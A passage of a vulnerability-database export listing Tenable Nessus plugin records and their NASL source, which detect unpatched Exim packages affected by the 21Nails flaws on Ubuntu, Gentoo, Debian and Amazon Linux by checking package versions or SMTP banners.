\"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"USN\", value:\"4934-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : Exim vulnerabilities (USN-4934-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by multiple\nvulnerabilities as referenced in the USN-4934-1 advisory. Note that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4934-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04|20\\.10|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04 / 20.10 / 21.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '18.04', 'pkgname': 'exim4', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'exim4-base', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'exim4-config', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'exim4-dev', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '18.04', 'pkgname': 'eximon4', 'pkgver': '4.90.1-1ubuntu1.8'},\n {'osver': '20.04', 'pkgname': 'exim4', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'exim4-base', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'exim4-config', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'exim4-dev', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'eximon4', 'pkgver': '4.93-13ubuntu1.5'},\n {'osver': '20.10', 'pkgname': 'exim4', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'exim4-base', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'exim4-config', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'exim4-dev', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '20.10', 'pkgname': 'eximon4', 'pkgver': '4.94-7ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4-base', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4-config', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'exim4-dev', 'pkgver': '4.94-15ubuntu1.2'},\n {'osver': '21.04', 'pkgname': 'eximon4', 'pkgver': '4.94-15ubuntu1.2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-20T15:26:06", "description": "The remote host is affected by the vulnerability described in GLSA-202105-01 (Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Furthermore, a local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application or escalate privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2021-05-05T00:00:00", "type": "nessus", "title": "GLSA-202105-01 : Exim: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-09-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:exim", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202105-01.NASL", "href": "https://www.tenable.com/plugins/nessus/149277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202105-01.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149277);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28010\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28016\", \"CVE-2020-28017\", \"CVE-2020-28018\", \"CVE-2020-28019\", \"CVE-2020-28020\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\", \"CVE-2021-27216\");\n script_xref(name:\"GLSA\", value:\"202105-01\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"GLSA-202105-01 : Exim: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202105-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition. Furthermore, a local attacker could\n perform symlink attacks to overwrite arbitrary files with the privileges\n of the user running the application or escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202105-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.94.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.94.2\"), vulnerable:make_list(\"lt 4.94.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-20T15:26:05", "description": "According to its banner, the version of Exim running on the remote host is prior to 4.94.2. It is, therefore, potentially affected by multiple vulnerabilities that can lead to remote code execution.", "cvss3": {}, "published": "2021-05-05T00:00:00", "type": "nessus", "title": "Exim < 4.94.2 Multiple Vulnerabilities (21Nails)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-09-05T00:00:00", "cpe": ["cpe:/a:exim:exim"], "id": "EXIM_4_94_2.NASL", "href": "https://www.tenable.com/plugins/nessus/149260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149260);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/05\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Exim < 4.94.2 Multiple Vulnerabilities (21Nails)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Exim running on the remote host is prior to 4.94.2. It is, therefore,\npotentially affected by multiple vulnerabilities that can lead to remote code execution.\");\n # https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5800058f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.exim.org/static/doc/security/CVE-2020-qualys/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Exim 4.94.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar port = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nvar banner = get_smtp_banner(port:port);\nif (!banner) audit(AUDIT_NO_BANNER, port);\nif (\"Exim\" >!< banner) audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nvar matches = pregmatch(pattern:\"220.*Exim ([0-9\\._]+)\", string:banner);\nif (isnull(matches)) audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nvar version = matches[1];\n# Underscore was added to the vesion\nversion = ereg_replace(string:version, pattern:'_', replace:'.');\n\nif (ver_compare(ver:version, fix:'4.94.2', strict:FALSE) < 0)\n{\n report =\n '\\n Banner : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.94.2';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'Exim', port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:58:14", "description": "The Qualys Research Labs reported several vulnerabilities in Exim, a mail transport agent, which could result in local privilege escalation and remote code execution.\n\nDetails can be found in the Qualys advisory at https://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor Debian 9 stretch, these problems have been fixed in version 4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/exim4\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-05-07T00:00:00", "type": "nessus", "title": "Debian DLA-2650-1 : exim4 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2022-09-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2650.NASL", "href": "https://www.tenable.com/plugins/nessus/149345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2650-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149345);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28017\", \"CVE-2020-28019\", \"CVE-2020-28020\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Debian DLA-2650-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/exim4\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/05/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:01:32", "description": "The version of exim installed on the remote host is prior to 4.92-1.33. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2022-1622 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root- owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). 